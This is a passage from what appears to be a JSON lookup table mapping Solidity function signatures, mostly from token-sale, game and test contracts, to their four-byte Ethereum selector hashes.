"0x8de1dcea", "presaleFundsRaisedInWei()": "0xe380575a", "bnbToken()": "0x2b17b6a9", "TOKEN_TRANSFER_PROXY_CONTRACT()": "0xadd1cbc5", "twoMonthsLater()": "0x51c69b12", "CARD_TAKE_SHARE()": "0x5eaefb31", "att()": "0xba36f423", "MINIMUM_AMOUNT()": "0x257d9bb8", "ownerPart()": "0x598077b9", "level_5_percent()": "0x45e82175", "totalMigratedOut()": "0xe98c365b", "totalTokenDistribution()": "0x215afc5f", "transfer_left_funds_to_project()": "0xa37173e9", "minimal_token_sell()": "0x9efc81fe", "earlyReserveBeginTime()": "0xef80c53a", "minimumGoal()": "0xbc697319", "MAX_WEI()": "0xe4aa8140", "COIN_COST_ICO_TIER_3()": "0xd7642ae2", "PRICE_STAGE_TWO()": "0x031f22e7", "schoolOrdering()": "0x6d88885e", "highestBidAddress()": "0x521b20ec", "CROWDSALE_PHASE_1_START()": "0x16b1f6b3", "Set()": "0x2081e911", "buyOrderTotal()": "0xf316ea78", "MIN_PRESALE()": "0xecf0848f", "EGGS_TO_HATCH_1FAIRY()": "0xfcdf350b", "Totalsupply()": "0x9707f708", "isTheContract()": "0x499e6c10", "sigBountyProgramAddress()": "0xfd619dce", "retentionMin()": "0xba3d0cb5", "MEW_RESERVE_FUND()": "0x148ab078", "firstWeekTokenPrice()": "0x11b546f6", "tokenOwnerBurner()": "0x773531f3", "lastBlock_v0Hash_uint256()": "0x3c53cb96", "preSaledeadline()": "0x07c24086", "WITHDRAWAL_WINDOW()": "0x56765c51", "author2()": "0x9ed474b3", "BACKUP_THREE()": "0x24ed3e78", "ROCK()": "0xb93e0e39", "totalTokensCap()": "0xda446958", "getCurrentBragKing()": "0x7a55d4bd", "secondPeriod()": "0xe4818e4b", "END_TIMESTAMP()": "0xa07c765f", "migrationIndex()": "0x4da36913", "totalEthBankrollCollected()": "0x87c23143", "setICO4Phase()": "0x9ef0653c", "icoPart()": "0x6c5b685f", "deliveredEth()": "0x586e8283", "getSaleStage()": "0x45c16a22", "team1Balance()": "0xdef9176c", "holderTeamTokens()": "0xf6f6fc74", "maxStage1AllocationPerInvestor()": "0x900d6f39", "secToNextInterestPayout()": "0x886b4954", "phaseDuration()": "0xac5553ce", "oneTokenInCents()": "0x7e945935", "directorA()": "0xd05efd40", "destroyAccount()": "0xeb0331d5", "soldSale()": "0xfc9dab52", "isRefund()": "0xd921eb78", "leekStealToday_()": "0x7e0d8b27", "donacionCruzRoja()": "0x98547a45", "start_declaration()": "0x9f97d937", "minDiscountEther()": "0x88df31f0", "_mode()": "0xc5c03af3", "reserveRate()": "0x58d7bf80", "miningOnePlat()": "0xe63a6788", "RESERVED_TOKENS_ICO()": "0x65030adb", "TeamWallet()": "0x677a8870", "turnOffCanUpdateBackWindowAdjustmentRatio()": "0x793ec6c2", "getAllProviders()": "0x3bb4497c", "challenge(bool)": "0x1f4e996b", "ProofLibInterface()": "0x1d57bcf7", "ConstructorContract(uint256)": "0x661e3605", "__stopBlock()": "0xc7102df7", "__startBlock(string)": "0x01bb85a4", "DSFalseFallbackTest()": "0x92c8eb96", "testFallback()": "0x8a46bf6d", "DSTrueFallbackTest()": "0x3f74fecb", "exec()": "0xc1c0e9c4", "testSafeToAddFix()": "0x5dcdddd1", "testFailNormalWhitelistReset()": "0x399fdb86", "testFailBreach()": "0x4e209678", "testErrorTransferToNullAuthority()": "0xda6b31b9", "testErrorTransferToRejectAuthority()": "0x138cc941", "testErrorNonOwnerCantBreach()": "0x5858ef10", "testAuthorityTryAuthUnauthorized()": "0xfd339d18", "testAuthorityTryAuth()": "0x31ab4066", "testFailAuthorityAuth()": "0x8fd28bcf", "testAuthorityAuth()": "0x9205fbc2", "testUpdateAuthorityEvent()": "0xaa7dcd84", "testOwnedTryAuthUnauthorized()": "0xcae523c1", "testOwnedTryAuth()": "0xd3aa831f", "testFailOwnedAuth()": "0x7ac91cc2", "testOwnedAuth()": "0x9e920587", "testConstructorEvent()": "0xfe6f0d82", "doTriggerTryAuth()": "0xd42bf301", "doTriggerAuth()": "0x31db4b95", "triggerTryAuth()": "0x6cb3d30a", "triggerAuth()": "0x2a714078", "setCanCall(address,address,string,bool)": "0x013d64bd", "testUnset()": "0x62a0b56b", "testTryGet()": "0x4464aec7", "testTryGetUnset()": "0x7d287697", "testFailGetUnset()": "0x4bd70ea3", "NullMapTest()": "0xa005b87b", "getApproval(address,address)": "0x89fcd099", "setApproval(address,address,uint256)": "0x0c9fcec9", "testSetBalanceUpdatesSupply()": "0x6f4dd69c", "testSetBalanceSetsSupplyCumulatively()": "0xcd9380d5", "testSetBalanceSetsSupply()": "0x0cee22e9", "testFailMoveBalanceDueToInsufficientFunds()": "0xd930a90b", "testMoveBalance()": "0x953a7fab", "testFailAddBalanceAboveOverflow()": "0x9bac8602", "testFailSubBalanceBelowZero()": "0x1dda5c7d", "testGetUnset()": "0x2f0b15f6", "testSetAndGet()": "0x0e757a2e", "MapTest()": "0x2c60a055", "testBuildTokenSystemCost()": "0xd3ea3322", "TestFactoryUser()": "0x510f44cb", "buildDSNullMap()": "0xb8d94b95", "buildDSTokenRegistry()": "0xa7c5052e", "buildDSTokenFrontend()": "0x3358d2d3", "testTryProxyCallWithValue()": "0xdd5244b4", "testProxyCallWithValue()": "0x60a60fd8", "testTryProxyCall()": "0x28a45038", "tryExecute(address,bytes,uint256)": "0x039a21b8", "execute(address,bytes,uint256)": "0xa04a0908", "testFailTooManyMembers()": "0x0caf9d39", "testMemberAddedEvent()": "0xdf3a6b10", "testFailNotEnoughValue()": "0x77e4fb04", "testFailTooFewConfirms()": "0xc1829a14", "testFailChargeMoreThanApproved()": "0xbfc3cd2f", "testFailTransferWithoutApproval()": "0x5fe22c8b", "testChargesAmountApproved()": "0xb9a0a708", "testApproveSetsAllowance()": "0x833b4596", "testFailInsufficientFundsTransfers()": "0xe7faecec", "testFailWrongAccountTransfers()": "0x61e539da", "testValidTransfers()": "0xe13dc28b", "testTransferCost()": "0x10922cc1", "testSetupPrecondition()": "0x6632a507", "DSTokenTest()": "0x0994a0a0", "doBalanceOf(address)": "0xbc2a4dd6", "doAllowance(address,address)": "0xfa566ddd", "doApprove(address,uint256)": "0xa8484938", "doTransfer(address,uint256)": "0x0f24f5c8", "doTransferFrom(address,address,uint256)": "0x2b4a3b31", "emitApproval(address,address,uint256)": "0x5687f2b8", "emitTransfer(address,address,uint256)": "0x23de6651", "testWithdraw()": "0xd509b16c", "testDeposit()": "0x7f924c4e", "testFailControllerChargeMoreThanApproved()": "0x821e9169", "testFailControllerTransferFromWithoutApproval()": "0xf712d7ff", "testControllerApproveSetsAllowance()": "0xe50dce71", "testFailControllerInsufficientFundsTransferFrom()": "0x296ed88f", "testFailControllerInsufficientFundsTransfer()": "0x6f4812e2", "testFailControllerUnapprovedTransferFrom()": "0xa32f0f41", "testControllerApproveTriggersEvent()": "0x2f5d3916", "testControllerTransferTriggersEvent()": "0x1f2e886c", "testControllerValidTransferFrom()": "0x0d8b5fa2", "testControllerValidTransfers()": "0x730720b8", "testTotalSupply()": "0xeb7492d1", "testBalanceOfReflectsTransfer()": "0xfb09b1ac", "testBalanceOfStartsAtZero()": "0xf3e3c629", "testAllowanceStartsAtZero()": "0x2977b1b1", "testSetBalanceDb()": "0xd0bff051", "testGetBalanceDb()": "0xea7a7184", "testSetApprovalDb()": "0x4df53a0f", "testGetApprovalDb()": "0x7353f62b", "testSetFrontend()": "0x9131d803", "testGetFrontend()": "0x4fab2ca4", "reputationHashSubmissions(address)": "0x7e5912d7", "getProof(bytes)": "0x693ac4fb", "nInvalidatedHashes()": "0x4c0348ee", "insert(bytes,bytes)": "0x20ba5b60", "transfer(address,uint256,bytes,string,bool)": "0xb373f167", "attackPlayer(address)": "0x5dc22cce", "viewUnclaimedResearchDividends()": "0x4efdd4f9", "fundGooResearch(uint256)": "0xa21f74b8", "ERC20Rescue(address,uint256)": "0xdab78820", "withdrawDevelopersFund(address)": "0x2cc5cfd6", "changeMaximumInvestmentsAllowed(uint256)": "0x85d02c8a", "changeWaitTimeUntilWithdrawOrTransfer(uint256)": "0xb4a9d156", "cashoutEOSBetStakeTokens_ALL()": "0x7a09588b", "cashoutEOSBetStakeTokens(uint256)": "0xc4628520", "checkWhenContributorCanTransferOrWithdraw(address)": "0x8a99fc87", "EOSBetBankroll(address,address)": "0xef3d622b", "payOraclize(uint256)": "0x66479c08", "receiveEtherFromGameAddress()": "0xfbe00e8e", "payEtherToWinner(uint256,address)": "0xbecd0580", "getMaxWin()": "0x91a1f16a", "receivePaymentForOraclize()": "0xa3b9b8d1", "payDevelopersFund(address)": "0x8579c10e", "batchTransfer(address[],uint256)": "0x83f12fec", "logSweep(address,address,address,uint256)": "0x28090abb", "reinvest()": "0xfdb5a03e", "lotteryAddresses(uint256)": "0xf3b4735e", "lotteryParticipants()": "0xf0d4d1a6", "getLotteryData()": "0xe58f2623", "totalStake()": "0x8b0e9f3f", "dividendsForUser(address)": "0x86be3981", "withdrawalsCTR()": "0x7de295d2", "checkIfEligable(address)": "0x73835f35", "totalWithdrawals()": "0x60464627", "preauthorize(address)": "0x55e2305e", "stake(address)": "0x26476204", "investment(address)": "0x0bd18d7a", "computeEndowment(uint256,uint256,uint256,uint256,uint256)": "0x63b6240d", "addRequester(address,string)": "0x056bef9e", "checkClaim(string,string)": "0x1e6c593c", "addClaim(string)": "0x7b3ae1f1", "DelegatedIdentity(address)": "0xce3498b8", "Destroy()": "0xf58fef8e", "RefundTicket(address,uint256)": "0x949a6868", "ChangeQuota(uint256)": "0x5bec1496", "BuyTicket()": "0x761aef78", "GetQuota()": "0xfcb1cba0", "getCurrentNumberOfVoters()": "0x405bd7bb", "payOutVoterByAddress(address)": "0x728880c2", "payOutVoterById(uint256)": "0x4718dc4d", "setPayoutAmount()": "0x12a12106", "setVoteFactory(address)": "0x00f9ac78", "setApprovals(address,address,uint256)": "0xe32d5cf8", "setBalances(address,uint256)": "0x28e69b16", "setSupply(uint256)": "0x3b4c4b25", "TokenData(address,uint256,address)": "0x57d1c582", "getCredit(address)": "0x57344e6f", "setCredit(address,uint256)": "0xb40ee8b4", "withdrawETH(address,address,uint256)": "0xe7137dbf", "Rollback()": "0xe7058e15", "KnownTokens(address,address,address)": "0x5ecfdcfc", "getSwapOutgoing(uint256)": "0x0aac1073", "addSwap(bytes5,bytes5,bytes32,bytes32,bytes12,bytes32,bytes32,bytes12)": "0xf52bd7cb", "RequstOwnership()": "0x9c211755", "TransferOwnership(address)": "0xcfaaa266", "Asset(string)": "0x0809f95d", "callIt(uint256)": "0xfa888c74", "setIt(address)": "0xca07218c", "setAA(uint256)": "0x7ccd3f79", "setSafeToken(address)": "0x393eec7b", "Balances(address,address,address)": "0xcc2f5186", "getWithdrawalData(uint256)": "0x1ebdd39a", "redeem(uint256,address)": "0x7bde82f2", "withdraw(uint256,bytes,address[])": "0x413bba97", "approveWithdraw(uint256)": "0xec4673d1", "checkBalance(address,uint256)": "0x4d7b9bd5", "claimPrepaid(uint256,uint256,uint256,string,uint256)": "0xfedabacf", "setPrepaid(address,uint256,uint256,string,uint256)": "0x453fef69", "cofounderApproveSwitchRequest(address,bytes32)": "0x1423649b", "founderSwitchRequest(bytes32,bytes32)": "0x4f4e1b74", "cofounderSwitchAddress(address)": "0xa47c6b84", "PromissoryToken(bytes32,address,uint256)": "0x974bd64b", "SafecontractsTREXToken()": "0xdc9a1df3", "numCampaigns()": "0x2c0f7b6f", "addressOf(address,uint256)": "0x146c8710", "registeredAt(uint256)": "0x891df671", "abiOf(uint256)": "0x20398971", "idOf(address)": "0xd94fe832", "greet(bytes)": "0x29638223", "OracleChainToken(uint256,string,uint8,string)": "0xa996d72e", "simpleICO(string,string,uint8,address,uint256[],uint256[],int256)": "0xcfcc09a9", "standardICO(string,string,uint8,address,uint256[],uint256[],address[2],address[])": "0x8c6fc437", "Launcher()": "0x104ce199", "transcodeReceiptHash(string,uint256,bytes32,bytes32,bytes)": "0x3bced141", "personalSegmentHash(string,uint256,bytes32)": "0xfc1f5c9c", "segmentHash(string,uint256,bytes32)": "0x1e4623e1", "validateReceipt(string,uint256,bytes32,bytes32,bytes,bytes,bytes32)": "0x7434206e", "validateBroadcasterSig(string,uint256,bytes32,bytes,address)": "0xab8f3c98", "shouldVerifySegment(uint256,uint256[2],uint256,bytes32,uint64)": "0xc8c9b1f8", "calcFees(uint256,string,uint256)": "0xf8702fe1", "validTranscodingOptions(string)": "0x8f5c5d40", "getTransactionHash(bytes)": "0xa2deadbd", "getValue(bytes)": "0xb6576bdf", "getRecipient(bytes)": "0x9dbd1b96", "getPolicyHolder(bytes)": "0xcb4f1d85", "BitcoinBlackPearl()": "0x2a7813a4", "interactWithXYZ()": "0xe8f72850", "SimpleERC20Token(uint256,address)": "0x612a711f", "DimaCoin()": "0x4f779753", "GenHeliosCoin()": "0xb35eeb46", "TopPayCoin()": "0x7111ed97", "wetCoin()": "0x90d4bd45", "HPBToken(address)": "0xe2621a66", "KPCoin()": "0x35410f85", "getPackage()": "0x1b93aa8d", "setPackage(bytes1[42])": "0xaaea144d", "time_out()": "0xa101c2d3", "_check_winner()": "0x10d08ef4", "open_commitment(uint256)": "0xa2ae72ec", "add_player(bytes32)": "0xebc8b934", "sha3(uint256)": "0x88445e29", "signBBODocument(bytes,bytes)": "0xdac1182e", "getUserSignedDocuments()": "0xb5b73c63", "getUsersByDocHash(bytes)": "0x028e3731", "createBBODocument(bytes32)": "0x9c5e078f", "verifyBBODocument(bytes,bytes)": "0xf686fa10", "RelentlessConscience2Token()": "0xca7044c3", "restartMinting(string)": "0x3b94b012", "burnHackingAmount(address,string)": "0x3149694a", "burnAdminAmount(uint256)": "0x76227f3b", "MultiTransfer(address[],uint256[])": "0x0896937e", "UnLockAddress(address)": "0xc201df97", "SetLockAddress(address)": "0xc286f3d9", "SocialMedia()": "0xe1d2d3e4", "restartCrowdsale()": "0x144136a1", "BlacklistParticipant(address)": "0xd04d2ca3", "WhitelistParticipant(address)": "0x630babac", "withdrawFromEscrow(address,bytes32)": "0x26663203", "Forwarder(address)": "0x3d2796f5", "Airdrop(address,uint256)": "0x8c32c568", "withdrawEgereg(uint256)": "0xc8226e61", "resetCrowdSaleaddress(address,address)": "0x28e8ed1b", "depositEgereg(uint256)": "0x3c0fcdd1", "extendExpiration(uint256)": "0x0a114a70", "setEncryptKey(string)": "0x9b539a17", "setEgeregAddress(address)": "0xc72e9e45", "approveDeliverable(bytes32)": "0x3b72a1b6", "fulfillDeliverable(bytes32)": "0xd30fa946", "getSellPrice()": "0x43d32e9c", "_fulfill(bytes32)": "0x4ac54245", "eth2MNT(string)": "0xbc4998b9", "addContent(string,string,uint256)": "0x70097106", "helloworld()": "0x2f2f4859", "isValidIndex(uint256,uint256)": "0x65e8faf6", "addab()": "0x35e6a7af", "generateContentID(string)": "0x79c749cd", "newDeliverable(uint256)": "0x585d2133", "ConstructorTest(uint256,uint256)": "0xa0fa0fb4", "currentFulfillment(string)": "0x418c7de1", "getContentByName(string)": "0xc3e0bbad", "getClaimableRewards(bytes32)": "0x24e8b3ec", "_approveEscrow(bytes32,uint256)": "0xd22ac06f", "_depositEscrow(uint256)": "0xf351d166", "testegy(uint256,string,string)": "0xecf90824", "completeDeliverable(bytes32,address,address)": "0x75ea1b68", "MemoireClement()": "0xe0d05c51", "CryptoPrueba()": "0x8baf7a0c", "buyerAddressTransfer(string,address,address)": "0xffc48c61", "refund(string,address)": "0x71cc805a", "getPurchaseDetail(uint256,uint256)": "0xc48e5ec4", "setTokenDistributor(address)": "0x38280e6b", "registerProduct(address)": "0x2d46f5df", "isLive(uint256)": "0x27507458", "buyerAddressTransfer(bytes32,address,address)": "0xa4ab3e45", "release(bytes32)": "0x67d42a8b", "releaseProduct(address)": "0x351be6ad", "setCriterionTime(address,uint256)": "0x700a7db1", "addPurchased(bytes32,uint256)": "0xf3a5626b", "addPurchased(address,address,uint256)": "0x313a9204", "subWeiRaised(uint256)": "0xec6b393d", "addWeiRaised(uint256)": "0xaf1b5feb", "getCurrentBonusFactor()": "0x7d363720", "QCOToken(address,address,address,address,address)": "0x4acb3e59", "YoonContract()": "0x629f1486", "Lancer()": "0x23afba86", "tryClose(bytes32)": "0x80ef353d", "startChallengePeriod(bytes32,bytes,address)": "0x9013d1ed", "updateState(bytes32,uint256,bytes,bytes,bytes)": "0x2af3b7f8", "newChannel(bytes32,address,address,bytes,uint256,bytes,bytes)": "0x6d46398b", "getChannel(bytes32)": "0x831c2b82", "retrieveWineData(bytes32)": "0xaf52fbed", "transferWine(address,bytes32)": "0xe7ff8901", "createWine(string,string,string,string,string,string,bytes32)": "0x5e3e9158", "removeTrustedPartner(address)": "0x5cae7767", "getTrustedPartner(address)": "0x41cbd6ea", "addTrustedPartner(address,string,string)": "0xa052c595", "getWineOwner(address)": "0xcde25f8a", "registerWineOwner(address,string,string)": "0xa9aac3e4", "getOwnerHistoryCountOf(bytes32)": "0xdef0defa", "getOwnerHistoryAt(bytes32,uint256)": "0x6faa52b3", "getWineIdentifierAt(address,uint256)": "0x3813a7f2", "BACA()": "0x294cd2e8", "xyjtoken(uint256,string,string)": "0xfa24e7a0", "IloveYou()": "0x0d3665b5", "ZipflaxToken()": "0x9bd2d912", "WIZE()": "0x666c7ed0", "unbuy()": "0xceb98dc7", "reject(uint256,string,uint256)": "0x4ca18ebd", "accept(uint256,string,uint256)": "0x553bf56d", "buy(uint256,string,uint256,uint16)": "0x0fb59f95", "addDescription(string,uint256)": "0xeda50e33", "getMoney(uint256)": "0x3262fd9a", "arbYes(uint256,address,uint256,string,uint256)": "0x6958420b", "no(uint256,string,uint256)": "0x34d24bff", "yes(uint256,string,uint256)": "0x95a5dfc0", "logEvent(uint256,string,uint256,uint16,address,uint256,uint256)": "0x51274842", "logDebug(string)": "0x9975c06b", "EscrowGoods(address,uint256,uint256,uint256,uint16,uint256)": "0xd3b3809c", "killya()": "0xb96297b5", "TEChain()": "0x41264107", "TWCToken()": "0xb92d6c2f", "Tradable()": "0xae2cbc91", "MakeTradable(bool)": "0x309fcbdd", "UnfreezeAccount(address)": "0xb36c8022", "FreezeAccount(address)": "0xce0df06b", "BuyToken(address,uint256,string)": "0x321de1d4", "GrantToken(address,uint256,string)": "0x62d590ac", "ZegartToken(uint256,string,string,string)": "0x257d849f", "withdrawal(address,uint256,uint256)": "0x2e4d3189", "HypeToken()": "0x3a73b0ad", "SEADToken(uint256,uint256,uint256)": "0x8a4c81c2", "emergencyERC20Drain(uint256)": "0x3d0c3836", "setupSaleContract(address)": "0x2f204237", "TokenSaleLockTransfer(uint256,uint256,uint256)": "0xd83616b2", "setSellDividendPercent(uint256,uint256)": "0x8fe2eb9e", "getOfferPriceCandy(uint256)": "0x23d9ea80", "getOfferPriceEth(uint256)": "0x699f0c72", "buyUnicornWithCandy(uint256)": "0xd029a530", "buyUnicornWithEth(uint256)": "0x383a194c", "sellUnicorn(uint256,uint256,uint256)": "0x29cf90f3", "minusTourFreezingTime(uint256,uint256)": "0x39dad8f5", "minusFreezingTime(uint256,uint256)": "0x3900f8f6", "Ulti()": "0x912f952f", "backVenusCoinOwner()": "0x8301cfec", "setInvestorsFee(uint256)": "0xe278c0f2", "odds(uint256)": "0x46156ea0", "updateProfit()": "0x8ec84812", "changeWinConfig(uint8[],uint8[])": "0x75924b95", "CryptoSlotsGame()": "0xe281d7e4", "sumAmounts(uint256[])": "0xf7d7477b", "batchTransferEther(address[],uint256[])": "0xeb14f53e", "batchTransferEtherWithSameAmount(address[],uint256)": "0x3f4c0733", "distributeNIM(address[],uint256,uint256)": "0xf502cdc0", "NIMBUS()": "0x2b02d9af", "CSTToken()": "0x5211e91e", "_createDank(string,address,uint256)": "0x3827d0bf", "getDank(uint256)": "0x991162db", "createContractDank(string)": "0xadf46a39", "EtherDank()": "0x2302c948", "firstMintRound0For(address[],uint256[],bool[])": "0x5247b9e9", "cryptoWillToken()": "0xe3e7b439", "F2UToken()": "0x33d58ca6", "distributeGLAU(address[],uint256,uint256)": "0xb59a1598", "GLAU()": "0xcebae575", "Tegchain(uint256,string,string)": "0xfeec6fc1", "Conserve()": "0x266b2eb5", "internalRedeem(address,uint256)": "0x181d85eb", "forcedRedeem(address,uint256)": "0xd5364231", "redeemBounty(uint256,uint256,uint8,bytes32,bytes32)": "0x7a11dfb4", "AuctusBountyDistribution()": "0xada6e537", "Bitscoin()": "0xc76a74df", "CompcoinCash()": "0x7f63040b", "EthereumPoint()": "0x1d7d8d2e", "retrieveEth(address,uint256)": "0x5d88383e", "kycRefuse(address)": "0x34d33f9f", "kycApprove(address)": "0xb6ea62de", "EQU(uint256,string,string)": "0xb6984002", "getGamePrize(address,uint256)": "0xc9c447e0", "getGameWin(address,uint256)": "0xa236f388", "getGameNumber(address,uint256)": "0x05b09e07", "getGameHash(address,uint256)": "0x4c8c121e", "getGameEnd(address,uint256)": "0xc54f3409", "getGameStart(address,uint256)": "0x487a5057", "getGameAmount(address,uint256)": "0xd13b54b7", "getGameIds(address)": "0xca0157cd", "ORZToken()": "0xfc89f349", "DMINT()": "0x692b3712", "PolyAi(uint256,string,uint8,string)": "0xb01d54ed", "IssueIQTToken()": "0x912f6c71", "winnerWithdraw()": "0xe10b650b", "revealWinner()": "0x6c699905", "placeBet()": "0xf90f4560", "STARLIGHT()": "0x0296b3a8", "substractFee(uint256,uint256)": "0xbb083c2b", "trade(address[8],uint256[6],uint256,uint8,bytes32,bytes32)": "0x9053f420", "EtherDeltaHandler(address)": "0x264e3018", "HTL()": "0x701dfb92", "make(uint256)": "0x516517ab", "account(address,address,uint256)": "0x7d50bef3", "MuxeToken()": "0x112b3c52", "assignReserved(address,uint8,uint256)": "0x1019635d", "battle(bytes8,bytes5,bytes8,bytes5)": "0xcd6566b0", "isEtherSpaceBattle()": "0x09bb9b04", "bytesToBytes8(bytes)": "0x5c552879", "bytesToBytes5(bytes)": "0x58efa06f", "bytesToBytes2(bytes)": "0x09fc7046", "newGame(uint256,uint256,uint256)": "0x30852db8", "NetkingToken(uint256,string,uint8,string)": "0xc9d07650", "HarjCoin()": "0xcefe23dd", "redeemTokens()": "0xe9a9c50c", "VIBEXToken()": "0x71ea6c73", "swap(address,uint256)": "0xd004f0f7", "swapTokenInfo(address)": "0xcfea3bb6", "setSwapToken(address,uint256,uint256,uint256,uint256,bool)": "0x97a53219", "swapActivityHandler()": "0x93e7155b", "investorsStockInfo(address)": "0x97eb1800", "investorsInfo(address)": "0x8bab6718", "investorsAddress(uint256)": "0xdce5f277", "completeIcoPart2()": "0xbefbae04", "completeIcoPart1()": "0x9ed49005", "crowdsaleBonus(uint256)": "0x9599ab63", "getCrowdsaleState()": "0x2d3fb0d5", "redemptionPriceCalculate(uint256)": "0xdb5df447", "referrerBonusCalculate(uint256)": "0x2ca0c835", "referralBonusCalculate(uint256,uint256)": "0x1ab46d4e", "regReferrers(address[])": "0xacf555b8", "regReferrer(address)": "0xdfcdc7f2", "referrersCount()": "0xd1558b7c", "getOwners(uint8)": "0xec759b80", "initialize(address,address[])": "0x946d9204", "afterIco(uint256)": "0x49cd4554", "delivery(address,uint256)": "0xb3bb594c", "setAdditionalOwners(address[])": "0x841016d0", "transferTokens(address[],uint256[])": "0x65620283", "contributeTo(address,uint256)": "0x543e10b4", "checkAndMint(uint256)": "0xa3330574", "calculatePurchaseAndBonuses(address,uint256)": "0x77df3013", "transferOwnershipToken(address)": "0x9ae6892b", "updateIcoStartTime(uint256)": "0x5c97efd6", "distributeForBountiesAndAdvisors()": "0xed1f2229", "distributeForFoundersAndTeam()": "0x926a9af0", "sendOrderedTokens()": "0x75b466d1", "toggleRefunds()": "0x9dfb64fd", "setIcoEndTime()": "0x0b82a541", "HireGoCrowdsale(uint256,address)": "0xa8d18bc0", "HireGoToken()": "0xda70db17", "getAccounts(uint256,uint256)": "0xe68a7c3b", "getNumAccounts()": "0x9ba89492", "setOwner(address,address,bool)": "0x5fef4d34", "transferrableBalanceOf(address)": "0xfb632ef9", "payOut(uint256,uint256)": "0xd4fb0bc1", "stringToUint()": "0x00961320", "Drawing()": "0x7313b3b1", "UNITTransferWhiteList()": "0x833c202e", "BasicWhitelist()": "0xdf8e03b1", "AudtStandardToken(uint256,string,uint8,string)": "0x43defdac", "ATT(address)": "0xc0263163", "freeStorage(uint256)": "0x47237f47", "buyTokensWithIcon(address,uint256)": "0x80b3c3d8", "setIconRate(uint256)": "0x855e0629", "GameCoin()": "0x74b67b27", "SumToken()": "0x0d290deb", "SetdivForTransfer(uint256)": "0xafa3a5d1", "SetmaxTokens(uint256)": "0x5d801ec4", "SetminTokens(uint256)": "0xab503e30", "SetsecondTTaxAmount(uint256)": "0x9903745f", "SetsecondTTax(uint256)": "0x08f68b90", "SetfirstTTaxAmount(uint256)": "0xd7520298", "SetfirstTTax(uint256)": "0x23020be5", "SetdivForPrice(uint256)": "0xd428bf3b", "SetdivForTank(uint256)": "0x46141657", "SetdivForSellBack(uint256)": "0xa129ecda", "SettankImposedMax(uint256)": "0xefa0a1ef", "TankTransfer(address)": "0xd7e30832", "GrabUnallocatedValue()": "0xba38743b", "TankDeposit()": "0x6ceac6e1", "TankWithdrawAll()": "0xfa02dcc1", "TankWithdrawSome(uint256)": "0xaf9f788c", "CurrentCoinPrice()": "0xf81ff8e7", "BurnAllTokens()": "0x07730eb9", "MintTokens()": "0x1c488825", "AKCToken()": "0x0f250780", "EthCannabis(address)": "0x43909d76", "isInvestorAllowed(address)": "0xc43f22c4", "denyInvestor(address)": "0xf741b602", "allowInvestor(address)": "0x0ecea92c", "transferFunds(uint256)": "0x133ae30b", "bonus(uint256,uint8)": "0x54caf101", "toEXTwei(uint256)": "0x560d3ca5", "canPurchase(uint256)": "0x8257f610", "saveTeamSpent(address,uint256)": "0xd40c0a58", "burnTokensAndRefund(address,address)": "0x705fbf3d", "setMintAgent(address)": "0xab802509", "isRefunded(address,address)": "0xbb74dcda", "earnedFunds()": "0x159bd2f3", "etherFundsOf(address,address)": "0x18bf0225", "setBounty(address)": "0xbc300ed3", "setAdvisors(address)": "0x88b322c3", "setARR(address)": "0xb2ff7945", "setFoundation(address)": "0xdb3543f5", "setTeam(address)": "0x095cf5c6", "maxSubmissions()": "0x158dec25", "prizeOwner()": "0x9dafb4df", "offchainUploaderAddress()": "0xb8be73ed", "totalT8EXSold_CORNERSTONE()": "0x73479f39", "THINK_TANK_FUND_TOKENS()": "0xf531aff2", "getActualTotalTokens()": "0xc53d8483", "withdraw_all_funds()": "0xd28fa960", "manualLCs()": "0x42118f51", "preEtherCap()": "0x9d7616a5", "numberOfHolders()": "0x0199c7b2", "preTge()": "0x651c2ff9", "saosao4()": "0x034a7bce", "presaleTokenCreationRate()": "0x3d228ce8", "BASE_TEAM()": "0x7fad9b53", "totalCookieProduction()": "0x089b4d46", "exchangeRateAuth()": "0xa7c6f483", "publicsaleTokens()": "0x957b8d98", "MAXIMUM_64_BIT_SIGNED_INTEGER_VALUE()": "0x970afd9b", "MIN_PRESALE2()": "0x31b93ae6", "ownerAPI()": "0xcb09b0d0", "address3()": "0x1e38046c", "getLowerBoundBlocksTillGameEnd()": "0xa3e14d74", "PRESALE_CONTRACT()": "0x37ff2506", "stage4_price()": "0x4948c2db", "erc20_contract()": "0x286ec4d1", "mintingEnabled()": "0x9fd6db12", "offerAsSacrificeFromVault()": "0x213a2622", "ownerBalance()": "0xbedcf003", "milestoneCount()": "0x0681ca55", "migrationFinished()": "0x3f9e23e5", "ALLOC_LIQUID_TEAM()": "0x518b1a33", "hardCapToken()": "0xf0b3a7ba", "advisorsTokensPercent()": "0x5c47e306", "tokensForFinalize()": "0xff8489df", "startGeneralSale()": "0x435c35b6", "totalPotAwayTeam()": "0xcd6e05e2", "lastBlock_f18()": "0xd11127c0", "nextBro()": "0x9a4fdf66", "hasOneStepWithdraw()": "0x76f7c522", "card_titanium_minamount()": "0xa457f27f", "secondExchangeRatePeriod()": "0xce5fa1e9", "totalSignatures()": "0x3015a521", "robotLiabilityLib()": "0x0d71212f", "tokenMult()": "0x1791db21", "LifeFactor_ii()": "0xaaea4472", "tgrContributedAmount()": "0x594afcff", "crownDecimals()": "0xeb65a2c7", "renewal()": "0x5241b39d", "payment_time()": "0xeb357e99", "phaseTwoBonusPercent()": "0x90044d18", "CoinSaleActive()": "0x77e7645b", "getLastAuctionId()": "0x0aff2076", "withdrawBAT()": "0x83973dc3", "tokenSale()": "0xb9420310", "compWallet()": "0xe660dd54", "ICOWallet()": "0xae764df3", "DAILY_FUNDS_RELEASE()": "0x0e3589d9", "prizePoolAddress()": "0xff31e930", "icoStarts()": "0x9c3e0f3f", "tokenBlogs()": "0x6e07979d", "SALE_CAP_IN_USD()": "0xb869f1e2", "getIssued()": "0x4d6aed53", "startdate()": "0xcde9f2ea", "minutos()": "0xfdaf22e8", "freezeHeight()": "0x2a4843a7", "nextAttackTimestamp()": "0xf6b098f8", "icoDiscountTime()": "0xd1ee2bf9", "bonusTokenRateLevelOne()": "0xb9fbe331", "ecoFundingSupply()": "0x3fcb21d3", "info_OwnerOfContract()": "0x534607fb", "Securities_5()": "0xe5b6b4fb", "fixedTotalSupply()": "0xa5d572c4", "COMPANY_WALLET()": "0xa0a0d331", "calculateFee()": "0xe6af35f0", "minGamble()": "0x5a975128", "WINNERTAX_PRECENT()": "0x35548c02", "round2Sold()": "0x3d960ec3", "lastMonth()": "0x99d786ca", "selectWinner20()": "0xf8a9972a", "multisigVault()": "0xd0c03f35", "changeRound()": "0xdd506e09", "allMaskGu_()": "0x65e7096d", "crowdSaleTokens()": "0x9308151b", "numTokensIssued()": "0x4a1281c6", "winningBid()": "0x8cf80438", "_thirdLevelEth()": "0x3bd4aab7", 